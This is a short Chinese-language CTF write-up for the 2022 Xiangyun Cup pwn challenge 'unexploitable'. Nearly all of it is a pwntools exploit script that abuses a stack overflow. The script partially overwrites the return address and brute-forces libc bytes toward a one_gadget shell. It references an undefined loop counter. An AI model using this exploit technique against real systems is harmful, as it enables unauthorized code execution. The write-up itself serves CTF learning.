祥云杯2022 pwn - unexploitable

一个栈溢出就没有其它的了

也没有输出函数，所以思路很明确，利用局部覆盖覆盖ret成7d0这个函数，然后使用爆破的方法，将libc_start_main的低地址改掉，改成one_gadget

from pwn import *
from time import sleep

#context(arch='amd64', os='linux', log_level='debug')

file_name = './unexploitable'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

'''
debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)
'''

def dbg():
    gdb.attach(r)

while True:
    try:
        li('count = ' + str(i))
        r = process(file_name)

        p1 = b'a' * 0x18 + b'\xd1'
        r.send(p1)

        one = [0x4f2a5, 0x4f302, 0x10a2fc]

        #c742fc
        p2 = b'a' * 0x18 + b'\xfc\x42\xc7'
        r.send(p2)
        #dbg()
        r.sendline('ls')
        data = r.recv()
        print(data)
        r.interactive()
        r.close()
    except Exception:
        r.close()
        continue